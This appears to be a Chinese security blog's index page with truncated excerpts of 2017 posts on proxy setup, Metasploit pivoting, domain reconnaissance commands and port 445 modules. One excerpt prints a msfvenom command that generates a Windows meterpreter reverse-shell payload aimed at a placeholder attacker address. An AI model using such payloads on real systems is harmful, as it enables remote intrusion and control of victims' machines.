1 小折腾/小配置 2017-07-22 Mac下proxychains无法生效解决办法 proxychains 安装命令:brew install proxychains-ng 原因:使用proxychains4 nmap的时候发现走的并非代理,而执行命令proxychains4 curl ifconfig.io 的时候,获取到的ip地址的确是本地的。无论怎... 阅读全文
2 小折腾/小配置 2017-07-21 linux下,多个SS同时使用方法 使用场景:在一台电脑上,由于有时候需要使用多个ip,但是其他办法又很麻烦,下面的方法,只需要多开几个CMI(commond interface)小窗口,然后更改一下本地代理的端口就好,使用不同的浏览器代理即可实现多IP使用。例如:sslocal -s ss的服务器地址 -p... 阅读全文
3 Web安全与渗透 2017-07-05 MSF之目标内网代理 利用场景:有时候使用msf拿到meterpreter 反弹了,但是想把机器代理到对方的内网里,任何请求也走对方的内网。此刻需要使用到msf的辅助模块 socks4a(msf也有类似lcx功能模块,名字portfwd )pivot是meterpreter最常用的一种代理,可以... 阅读全文
4 Web安全与渗透 2017-06-22 快捷方式powershell反弹到msf 生成一个msf后门msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f psh-reflection > psl.psl 在windows下创建... 阅读全文
6 Web安全与渗透 2017-06-21 内网(域)渗透基本命令 内网(域)渗透–基本命令————————————————————————————————————ipconfig /all ------ 查询本机IP段,所在域等 net user ------ 本机... 阅读全文
7 Web安全与渗透 2017-05-13 445端口之Metasploit集成使用 前言:445对坏人而言是个好端口,对好人而言是个坏端口。(小孩子才分好坏么?我想也是)使用环境:woobuntu(乌云版ubuntu),自带了MSF,不是最新版就sudo msfupdate吧升级一下。下载msf关于445的漏洞模块:git clone https://gi... 阅读全文